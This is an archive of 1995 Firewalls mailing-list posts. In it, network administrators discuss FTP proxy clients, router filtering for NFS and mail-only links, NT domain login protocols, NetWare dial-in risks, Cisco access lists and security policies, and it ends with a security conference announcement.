AA-1995Oct05.070658.0.8812; Thu, 05 Oct 1995 07:06:59 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQzjxg07039; Tue, 3 Oct 1995 18:08:55 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700 Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700 Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700 Date: Tue, 3 Oct 1995 13:46:08 -0700 From: Joe McGuckin Message-Id: <199510032046.NAA07589@ns.via.net> To: firewalls@GreatCircle.COM Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need a windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy. The problem is that most of the gui based windows FTP clients don't have a command line or a logging window to view status messages, etc. Any suggestions? -joe From firewalls-owner Thu Oct 5 12:02:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03995 for firewalls-outgoing; Thu, 5 Oct 1995 11:39:43 -0700 Received: from ns2.emirates.net.ae ([194.170.1.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA03988 for ; Thu, 5 Oct 1995 11:39:36 -0700 Received: from csa102.emirates.net.ae by ns2.emirates.net.ae (5.x/SMI-SVR495081401) id AA17881; Thu, 5 Oct 1995 22:38:05 +0400 Date: Thu, 5 Oct 1995 22:38:04 +0400 Message-Id: <9510051838.AA17881@ns2.emirates.net.ae> X-Sender: forster@emirates.net.ae X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: forster@ns2.emirates.net.ae (Andrew & Terri Forster) Subject: Copy of RFC1597 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Being new to the net ( only being in the UAE ) since August I'm interested in locating a copy of RFC1597. Any assistance as to where I can find it would be appreciated. Thanks in Advance AMF ========================================================================== Andrew M Forster Email: forster@emirates.net.ae Phone: +9712 262556 or +9712 453613 Fax: +9712 465344 ========================================================================== From firewalls-owner Thu Oct 5 12:09:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA28469 for firewalls-outgoing; Thu, 5 Oct 1995 09:36:37 -0700 Received: from cap.au.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA28443 for ; Thu, 5 Oct 1995 09:36:28 -0700 Received: from Microsoft Mail (PU Serial #0) by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.103600.0.12780; Thu, 05 Oct 1995 11:35:11 -0500 From: Pat_Heinle@STAR9GATE.MITRE.ORG (Pat Heinle) To: cmilam@cap.au.af.mil, Firewalls@GreatCircle.COM (Firewalls) Message-ID: <1995Oct05.103600.0.12780@cap.au.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Thu, 05 Oct 1995 11:35:11 -0500 Subject: Re: Firewalls-Digest V4 #573 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay2.UU.NET by cap.au.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct05.103659.0.8957; Thu, 05 Oct 1995 10:37:00 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzkah20513; Wed, 4 Oct 1995 13:56:32 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18290 for firewalls-outgoing; Wed, 4 Oct 1995 09:44:21 -0700 Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA18275 for ; Wed, 4 Oct 1995 09:44:07 -0700 Received: from star9gate.mitre.org (star9gate.mitre.org [129.83.22.1]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id MAA06776 for ; Wed, 4 Oct 1995 12:42:35 -0400 Message-ID: Date: 4 Oct 1995 12:46:35 -0500 From: "Pat Heinle" Subject: Re: Firewalls-Digest V4 #573 To: Firewalls@GreatCircle.COM X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reply to: RE>Firewalls-Digest V4 #573 From: pheinle@mitre.org Subject: RE> Borderware vs. Firewall-1 Mr. Tate asks: I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? rtate@folio.com -- Robert, "Info Security News" just had a supplement to their magazine for Sept/Oct. 95 entitled "Internet Security." Within the "Internet Security" supplement was a section -Shopping for Firewalls which contained a matrix of a majority of the current firewall products and their attributes. It might provided some additional insight. In addition, to your Security Policy which Luc noted in his response, another issue to consider is how well the Firewall product adjusts as your enterprise expands. Good luck. Patty -------------------------------------- Date: 10/4/95 11:34 AM To: Pat Heinle From: Firewalls@GreatCircle.COM !!! Original message was too large. !!! !!! It is contained in the enclosure whose name !!! is the same as the subject of this message. !!! !!! A preview of the message follows: Firewalls-Digest Wednesday, 4 October 1995 Volume 04 : Number 573 In this issue: -No Subject- IRC FLEXlm with proxy ...? Re: NFS Need Windows FTP client source Borderware (was: Information, We want information) Re: Encryption strength Borderware vs. Firewall-1 Exact format for subscribing the info security list. re: Encryption strength re re nfs Re: Mail Proxy Re: FW to FW FTP w/ no port > 1023 re: Encryption strength re: network address translation RE: Borderware vs. Firewall-1 [none] Re: Encryption strength Re: Mail proxy See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: Joseph Urban Date: 3 Oct 95 14:12:00 Subject: -No Subject- sunscribe firewalls-digest ------------------------------ From: oddboy@vegas.com Date: Tue, 3 Oct 1995 11:42:44 -0700 Subject: IRC I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) nut am curious what I should watch out for in terms of folks being able to hack through and into an OS. (i run solaris2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix. Any and all info will be greatly appreciated. Gideon Wober Systems Administrator Digitainment Corporation ------------------------------ From: jordan@Heuristicrat.COM (Jordan M. Hayes) Date: Tue, 3 Oct 95 12:09:16 PDT Subject: FLEXlm with proxy ...? Anyone built a FLEXlm proxy for FWTK? /jordan ------------------------------ From: Doug Hughes Date: Tue, 3 Oct 1995 13:42:56 -0500 Subject: Re: NFS > >I am sure that this topic has been beaten to death, so if someone would >just point me at the discussion (or tell me that there is no solution) >I would be happy to take it from there. I remember reading a paper a >couple years ago describing why NFS could never be made secure, but for >the life of me I cant seem to find it now. > >The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >dozen file systems that are exported read-only to all the other machines >in the domain. I would like to restrict their mounting to machines within >the domain while maintaining connectivity to the outside world. >SUN's software does not support this option, it only allows specifying >specific machine names, and the list of *all* machine names overflows >some internal limit in SUN's software. > >[ The machine uses DNS and not YP, it is rumored that possibly with YP one >can get by this limit, but I have no interest in adding YP to my list of >problems. ] > >So, the Questions > > (1) WITHOUT resorting to a firewall, is there any way to accomplish >what I want to do? > > (2) If not, can it be done with a `simple' packet filter, or does it >require a full blown firewall? > > > Reg.Clemens > clemens@dwf.com > > > Without necessary resorting to a firewall, you can have your router to the outside world block: port 2049/udp - NFS port 111 udp/tcp - Sun RPC source routed packets outside packets with internal IP source addresses (IP spoofing) This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is also a good thing to do. This way you can limit what networks are able to send RPC requests to your server. - -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" ------------------------------ From: Joe McGuckin Date: Tue From firewalls-owner Thu Oct 5 13:23:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06934 for firewalls-outgoing; Thu, 5 Oct 1995 12:47:30 -0700 Received: from aruba.lerc.nasa.gov (aruba.lerc.nasa.gov [139.88.35.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA06927 for ; Thu, 5 Oct 1995 12:47:25 -0700 Received: from nyjets.lerc.nasa.gov by aruba.lerc.nasa.gov with ESMTP (950215.SGI.8.6.10/LeRC/DLW/TAF(1.24-main)) id PAA24487; Thu, 5 Oct 1995 15:45:52 -0400 Received: by nyjets.lerc.nasa.gov (950215.SGI.8.6.10/LeRC/DLW/TAF(1.22p-local)) id PAA15839; Thu, 5 Oct 1995 15:45:51 -0400 From: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin) Message-Id: <199510051945.PAA15839@nyjets.lerc.nasa.gov> Subject: Re: Copy of RFC1597 To: forster@ns2.emirates.net.ae (Andrew & Terri Forster) Date: Thu, 5 Oct 95 15:45:50 EDT Cc: firewalls@greatcircle.com In-Reply-To: <9510051838.AA17881@ns2.emirates.net.ae>; from "Andrew & Terri Forster" at Oct 5, 95 10:38 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Being new to the net ( only being in the UAE ) since August I'm interested in > locating a copy of RFC1597. Any assistance as to where I can find it would be > appreciated. > > > Thanks in Advance > > AMF > ========================================================================== > Andrew M Forster > Email: forster@emirates.net.ae > Phone: +9712 262556 or +9712 453613 > Fax: +9712 465344 > ========================================================================== > Hello Andrew: RFC1597 subject title is, "Address Allocation for Private Internets". There are undoutably many places to get it (i.e. there used to be when I pulled it down!!). Ftp to the site ds.internic.net in the subdirectory rfc. Alternately you can go to the web site http://www.ds.internic.net and look where the RFC's are located. It's a searchable index. Ben -- ______________________________________________________________________________ | Ben Nowlin | If you don't get what you want in life, it's either NASA Lewis Research Center | a sign that you seriously didn't want it, or that ben@lerc.nasa.gov | you tried to BARGAIN over the PRICE. ______________________________________________________________________________ From firewalls-owner Thu Oct 5 14:01:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10770 for firewalls-outgoing; Thu, 5 Oct 1995 13:50:21 -0700 Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA10763 for ; Thu, 5 Oct 1995 13:50:18 -0700 Received: by netmail2.microsoft.com (5.65/25-eef) id AA18345; Thu, 5 Oct 95 14:52:18 -0700 Received: by netmail2 using fxenixd 1.0 Thu, 05 Oct 95 14:52:18 PDT X-Received: from chopper by xmtp2 with recvsmtp ; Thu, 5 Oct 1995 20:25:08 GMT Received: by CHOPPER with Microsoft Exchange id <01BA9325.D1CA5080@CHOPPER>; Thu, 5 Oct 1995 13:23:54 -0700 Message-Id: From: "Greg King (Exchange)" To: "firewalls@greatcircle.com" , "mark.horn1@jsc.nasa.gov" Subject: RE: Technical details of NT Domains.. Date: Thu, 5 Oct 1995 13:23:48 -0700 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Msxmtid: xmtp2951005202508RECVSMTP[01.51.01]000000b0-16207 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To logon onto a NT domain you have a rpc call the the domain server. The = RPC to logon is TCP. The datagrams to discover the DC to log onto is = UDP. If you need more info please let me know Greg King Microsoft=20 BackOffice Capacity Planning ---------- From: mark.horn1@jsc.nasa.gov[SMTP:mark.horn1@jsc.nasa.gov] Sent: Wednesday, October 04, 1995 12:00 PM To: firewalls@greatcircle.com Subject: Technical details of NT Domains.. Hello, We have some users who need to login to a windows NT domain that has = been set up here. We currently have an IP firewall installed. This firewall is installed = on our LAN and protects us from the Internet. Since there isn't a site wide firewall, it also protects us from the rest of JSC. Its a screened host gateway (Nomenclature taken from Marcus J. Ranum's "Thinking About Firewalls"). Currently, only IP is filtered at our firewall. All = non-IP protocolas are passed through. All non-IP protocols are filtered at the site's connection to the Internet. Now, it turns out that my users can't login to an NT domain. I wouldn't = have expected this because I assumed that NT would have used NetBEUI or some = such other non-IP protocol to communicate. After some experimentation, I've discovered that I need to set up the following for this to work: a) Each Win95 machine needs to have a WINS server configured b) UDP needs to be wide open to that Win95 machine. It looks like WINS is a UDP based protocol, and it manages the name = resolution for the NT domain. Then, using some unknown protocol, our machines talk = to the NT domain server for authentication. From there, they talk to the individual disk servers in the NT domain over NetBEUI. (All of this is = not much more than a Wild Ass Guess (tm)) So, the questions is can anyone tell me the specifics of how one logs = into an NT domain? In particular, what are the details of the data exchange? = What I'm looking for is something along the lines of how Brent Chapman = describes protocols in his tutorials (e.g. NTP servers send to & from UDP port = 123, NTP clients send to UDP 123, and from random UDP port >1023). Does anyone = know how logging into an NT domain utilizes UDP? If WINS is the only thing using UDP, has anyone set up udprelay to act = as a proxy for it? Thanks in advance. -- Mark Horn (sparkie) = horn@mickey.jsc.nasa.gov http://tommy.jsc.nasa.gov/~horn = mark.horn1@jsc.nasa.gov Free Advice and Opinions -- Refunds Available From firewalls-owner Thu Oct 5 16:02:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13902 for firewalls-outgoing; Thu, 5 Oct 1995 15:44:45 -0700 Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA11336 for ; Thu, 5 Oct 1995 14:06:18 -0700 Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA00280 for Firewalls@GreatCircle.COM; Thu, 5 Oct 95 17:04:05 -0400 Message-Id: Date: 5 Oct 1995 14:47:09 U From: "Dominy Leigh" Subject: RE: WWW & Proxy Servers To: Firewalls@GreatCircle.COM X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk May want to research Raptor's Eagle Firewall, they're at www.raptor.com. This family of products allows restrictions by username. _______________________________________________________________________________ From: stuart@loddon.demon.co.uk Date: Wed, 4 Oct 95 13:29:38 PDT Subject: WWW & Proxy Servers Apologies if the following questions has been asked before - if they have, I can't find them ! i) Is/Are there any proxy servers for WWW to restrict access to the WWW on a username basis AND to further restrict use of 'sub-protocols' supported by WWW such as ftp, gopher ... again on a username basis ? ii) If yes to i), can you provide pointers please ? iii) If no to i), is the requirement technically feasible - if so, any clues ? iv) If the above has been done, has it been integrated with strong authentication tokens e.g. SecureID, Digital Pathways or even S/Key ? TIA - ------------------------------------- Name: Stuart Broderick E-mail: stuart@loddon.demon.co.uk Date: 10/04/95:13:29:38 This site is not affiliated with any other in demon.co.uk. - ------------------------------------- From firewalls-owner Thu Oct 5 16:02:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13953 for firewalls-outgoing; Thu, 5 Oct 1995 15:46:24 -0700 Received: from remarque.berkeley.edu (remarque.Berkeley.EDU [128.32.152.164]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA13946 for ; Thu, 5 Oct 1995 15:46:21 -0700 From: tox@remarque.berkeley.edu Received: by remarque.berkeley.edu (8.6.10/1.31) id PAA05205; Thu, 5 Oct 1995 15:44:53 -0700 Date: Thu, 5 Oct 95 15:44:52 PDT To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #576 In-Reply-To: Your message of Thu, 5 Oct 1995 09:45:37 -0700 Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding the ISDN dialin to a Novell network as being a possible end-run around the firewall: Point out to your Netware person that various flavors of Netware have not been infallible in rejection bad root logon attempts. Depending upon the version running there, and which patches you have applied, root logon attempts w/ a bad password will most likely occassionally (espescially if stressed) be authenticated by mistake. If you are going to place that level of faith in the scheme, talk to Novell or one of the better Platinum resellers to make sure your faith is founded. If the ISDN solution you are looking at is more along the lines of an ether bridge than a shell, it's possible that you would also be left open to a denial of service attack by known schemes where crafted service advertisement packets can cause the server to suffer from a resource depletion severe enough to render it unusable for hours after such an attack has ended. I don't speak for Novell or my present employer. These are just some of my observations from having worked with Netware in the past. These problems may have been addressed more thoroughly in the last year than I'm aware of. Still, this is my $.02. Good luck, Tox Gunn *********************************************** * Tox Gunn .......tox@remarque.berkeley.edu * * "Your sanity is not my responsibility!" * *********************************************** From firewalls-owner Thu Oct 5 16:30:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA14309 for firewalls-outgoing; Thu, 5 Oct 1995 16:06:31 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA14299 for ; Thu, 5 Oct 1995 16:06:24 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA05596; Fri, 6 Oct 1995 08:57:29 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma005593; Fri Oct 6 08:57:10 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA10714; Fri, 6 Oct 1995 09:03:09 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510052303.AA10714@citecub.citec.qld.gov.au> Subject: Re: cisco router extended access-list question To: ilias.liakopoulos@telecom.at (Ilias Liakopoulos) Date: Fri, 6 Oct 95 9:03:08 EST Cc: firewalls@greatcircle.com In-Reply-To: <199510050905.KAA23641@pina2.telecom.at>; from "Ilias Liakopoulos" at Oct 5, 95 10:05 am X-Mailer: ELM [version 2.3 PL11] content-length: 3794 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, First I am assuming you have a cisco with two interfaces. If you don't I think you should get one. If you are not using both, you should be. I think you are getting more than you want from your filters because you are only filtering on one interface. You really should be using two. For the purposes of the following discussion, I will assume that there are two interfaces; inside and outside. It doesn't really matter whether outside is an ethernet or serial. Further, both interfaces should use INCOMING filters. Thus what you really want for mail only access is: interface `outside' ip address 'outside address' 'some mask' ip access group 101 in interface `inside' ip address 'inside address' 'some mask' ip access group 102 in (1) access-list 101 permit tcp any gt 1023 'mailhost' 0.0.0.0 eq 25 (2) access-list 101 permit tcp any eq 25 'mailhost' 0.0.0.0 gt 1023 established (3) access-list 102 permit tcp 'mailhost' 0.0.0.0 gt 1023 any eq 25 (4) access-list 102 permit tcp 'mailhost' 0.0.0.0 eq 25 any gt 1023 They operate as follows: (1) allows any host to connect to your 'mailhost' on port 25. (2) allows the return packets from any host to which your mailhost is connected, when your mailhost initiated the connection (3) allows your mailhost to connect to any external machine on port 25 (4) allows return packets from the mailhost to any host which has connected Thus (1) and (4) are complimentary - to allow a connection to your mailhost (1) the return packets must get out (4). And, (2) and (3) are complimentary - to allow your mailhost to send mail (3) the return packets must be able to get in (2). I think that is right :-). Anyone car to comment? Whenever I try and work out things like this, I always draw a picture, eg: The arrows indicate the direction of the 'connection'. Remeber that tcp is two-way traffic. I want to send and receive mail / \ remote mailhost remote mailhost tcp=25 tcp>1023 ^ | | | | | |(2) V(1) ---------------------------------- router ---------------------------------- ^(3) |(4) | | | | | V tcp>1023 tcp=25 local mailhost local mailhost Remembering that tcp requires two-way traffic and that the return packets always have the ACK bit set (established) it becomes very easy to do the filters. Sometimes it requires some work to determine all the connections (eg ftp) but a picture will never steer you wrong. Colin > > Hello, > > I have set up an access-list like the example in UnileverCD > for allowing only SMTP connections (the IP addrs are invented): > > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25 > > SMTP works but with this config I tried telnet and it also works . > this is not acceptable and if I remove the established line -> > nothing works. > the interface config: > > interface Ethernet0 > ip address 2.2.3.2 'some adr mask' > ip access-group 102 out > > have I done something wrong in the config or is this a bug > in our version? : > [chomp] From firewalls-owner Thu Oct 5 17:00:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15117 for firewalls-outgoing; Thu, 5 Oct 1995 16:38:50 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15110 for ; Thu, 5 Oct 1995 16:38:39 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA07122; Fri, 6 Oct 1995 09:32:08 +1000 Received: from citecuf.citec.qld.gov.au(147.132.176.10) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma007118; Fri Oct 6 09:31:43 1995 Received: from jaykay.citec.qld.gov.au (jaykay.citec.qld.gov.au [131.242.4.117]) by citecuf.citec.qld.gov.au (8.6.10/8.6.10) with SMTP id JAA29494; Fri, 6 Oct 1995 09:35:50 +1000 Message-Id: <199510052335.JAA29494@citecuf.citec.qld.gov.au> From: "John Kidston" To: joe@ns.via.net (Joe McGuckin) Date: Fri, 6 Oct 1995 09:36:13 +1000 Subject: Re: Need Windows FTP client source Reply-to: j.kidston@citec.qld.gov.au CC: firewalls@GreatCircle.com Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: joe@ns.via.net (Joe McGuckin) > > I need a windows FTP client that can do SNK authentication. > I want to use it with the FWTK ftp-gw proxy. > > The problem is that most of the gui based windows FTP > clients don't have a command line or a logging window to view > status messages, etc. > > Any suggestions? > Try WS_FTP from Ipswitch (http://www.ipswitch.com). It is firewall aware and works well with FWTK ftp-gw proxy. It has a full logging window and can be run with command line parameters. > John Kidston j.kidston@citec.qld.gov.au CITEC voice: +61 7 2222356 fax: +61 7 2277890 317 Edward Street, Brisbane 4000, Australia "My opinions and CITEC's are not always the same." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Thu Oct 5 18:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16766 for firewalls-outgoing; Thu, 5 Oct 1995 17:47:23 -0700 Received: from furnace.cybergraphic.com.au ([203.5.40.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA16759 for ; Thu, 5 Oct 1995 17:47:18 -0700 Received: from mailgate.cybergraphic.com.au (mailgate.cybergraphic.com.au [203.5.40.130]) by furnace.cybergraphic.com.au (8.6.12/8.6.12) with SMTP id KAA01718; Fri, 6 Oct 1995 10:43:14 +1000 Received: from cc:Mail by mailgate.cybergraphic.com.au id AA813001359; Fri, 06 Oct 95 10:38:49 eet Date: Fri, 06 Oct 95 10:38:49 eet From: "greg hume" Message-Id: <9509068130.AA813001359@mailgate.cybergraphic.com.au> To: parks@xdiv.lanl.gov, firewalls@greatcircle.com Subject: Re: requests for Security policys Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Parks, On Thu, 5 Oct 1995, Parks Fields wrote: >Hello world, >I know the basic of security is a good security policy. I have >created a security policy but I am not 100% happy with it. Could some >of you >send me a copy of yours so I can figure out what mine is missing? >Thank you. The official response by most may be as follows 1) don't send out our security policy to anyone 2) deleted because of 1) ;-) On a more serious note, various books on firewalls have good sections on going about designing a security policy. Cheswick and Bellovin Firwalls and Internet Security (Addison-Wesley Publishing) has been an invaluable reference source for us. Our policy was designed and then agreed upon before the technology was looked at i.e.. taking a leaf from my Business Systems Analysis hat. We designed it based on what the business wanted to achieve. This allowed us to apply current and future technology to a well defined business need. We then applied the technology (Fire wall, routers, client applications, access rules etc..). Then we designed the business process's required to maintain the security level. After all the firewall and those that have the responsibility to maintain it are now (at least from our companies perspective) performing a business critical function. The biggest problem that needs to be overcome is getting management to sign on the dotted line. Without the policy being adopted high enough up in the organisational structure the ability to maintain the required security level (from a business perspective) it sure to be watered down. Do as much Analysis as you can within the time they (management) will allow. I wish I had the information contained in Alan Dowd's responses to this query when I got my fingers bunt (-: Good luck Greg. Senior Systems/Network Analyst Cybergraphic Systems PTY LTD 862 Glenferrie Rd. Hawthorn Melbourne, Australia 3122 From firewalls-owner Thu Oct 5 18:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA16974 for firewalls-outgoing; Thu, 5 Oct 1995 18:00:14 -0700 Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA16960 for ; Thu, 5 Oct 1995 18:00:05 -0700 Received: from mony.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA23757 for ; Thu, 5 Oct 95 20:35:11 -0400 Received: by mony.com (Smail3.1.28.1 #3) id ;Thu, 5 Oct 1995 18:33 EDT Received: by monygmc.mony.com (1.37.109.14/15.6) id AA213942361; Thu, 5 Oct 1995 18:32:41 -0400 From: David Kozinn Message-Id: <199510052232.AA213942361@monygmc.mony.com> Subject: Packet filtering OK for mail-only connection? To: firewalls@GreatCircle.com Date: Thu, 5 Oct 1995 18:32:41 -0400 (EDT) Reply-To: david@monygmc.mony.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1881 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm going to be assisting with the implementation of a "mail-only" connection to the Internet shortly. By "mail-only" I mean that while there will be a router connected to an ISP via a leased line, the only traffic that we want to permit will be SMTP traffic to a specific machine designated as our "mail gateway" server. The only other traffic allowed will be to support DNS so that the gateway machine (only) can find the proper host to connect to for outbound traffic. I've just finished reading the FAQ and Brent Chapman's paper on Packet Filtering, and I'm starting to better understand the issues involved. What we would like to do, initially, is to set up a router (which will probably be a Cisco 2501) to do packet filtering as Brent's described in his paper, to allow for this mail-only connection to a machine on our internal network. Eventually, we will add in a dedicated firewall machine between the inbound router and the internal network, but we'd like to put that step off for a while if we can be reasonably safe without doing that. What I'd like to know is this: Is the Cisco 2501 capable of filtering based on source port (not just source address) so that I can block incoming packets that aren't (apparently) coming from the remote SMTP server? Does the router provide for blocking start-of-connection packets so that a remote system can't use port 25 to launch an attack as described in Brent's paper? If this router won't do the trick, would a simple (hah!) firewall/mail gateway "between" the Internet, behind a filtering router, and the internal network, which could "see" the internal network, do the trick? What else should I be concerned with? TIA.........David -- David Kozinn dkozinn@csc.com / david@mony.com Computer Sciences Corporation Under contract to Mutual of New York Technology Management Group +1-201-907-6990 From firewalls-owner Thu Oct 5 20:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA18729 for firewalls-outgoing; Thu, 5 Oct 1995 20:01:58 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA18722 for ; Thu, 5 Oct 1995 20:01:51 -0700 Date: Thu, 5 Oct 95 22:52 EDT From: Jack Holleran Subject: 18th National Information Systems Security Conference To: firewalls@GREATCIRCLE.COM Message-ID: <951006025217.884121@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Event: 18th National Information Systems Security Conference Theme: Making Security Real Dates: October 10-13, 1995 Place: Baltimore Convention Center, Baltimore Maryland Cost: $280 Sponsors: National Institute of Standards and Technology National Computer Security Center Registration: On-site This is a reminder that the Government is not closed and the annual National Information Systems Security Conference is going to happen. We expect over 2200 attendees this year. Below is a list of the sessions and topics being discussed in a formal 6-7 concurrent track program. Below that list is a partial list of speakers at this conference. We and they invite you to attend. If you are serious about Information Security, this conference is indeed the place to learn from peers and experts. Sessions include: Research for the Future, High Speed ATM Networks, Secure DBMS Panel, Security Policy I & II, Security in Infinite Networks, Application Challenges, New Baselines, Cryptographic Application Program Interfaces, Intrusion Dection, and The Future of Formal Methods for Security. NCSC and NIST Products and Services, Building a MLS System: A Real Life Adventure, Trusted Products I & II, Information Systems Security Research Joint Technology Office, Developing and Incident Handling Capability, An Assurance Framework or Can Process replace Evaluation, Network Rating Model, Case Studies I & II, and Contingency in Action. The TMACH Experiment, Common Criteria Editorial Board, The New OMB A-130, Appendix III, Internet Security Evaluation & Assurance, Trusted Products - How they are Used, Trusted Technology Assessment Program, The Development of Generally Accepted System Security Principles, Key Escrow, Evaluation Criteria I & II, and Security Issues for Electronic Commerce. Continuous Process Improvement, INFOSEC Security Market, Encipherment, Metrics, Architectures, Will Encryption keep Out the Hackers, Security Plans, Requirements vs. Solutions, two (2) NII Security Initiative sessions, and INFOSEC, Prepare to Meet the New Millenium. Computer Crime on the Internet, Legal Issues, Computer Forensics and Law Enforcement, Advanced Educational Opportunities, Current Threats and Practical Solutions, The INTERNET: Problems and Solutions; Weaknesses and Vulnerabilities; Tools and Defenses; Implementing Solutions; Maintainance of Security; and, Information Warfare: Its Impact Upon Information Security. Introduction to Computer Security, Trusted Systems Concepts, Introduction to the Insecurity of the Internet, Trusted Networks, Security Engineering Principles, System Engineering CMM, two (2) unique Database Security Tutorials, A How to on Awareness and Training, How to Teach Information Security, and From Training Standards to Courseware. MISSI (2 sessions and a workshop), A Tutorial: The Internet, World-Wide 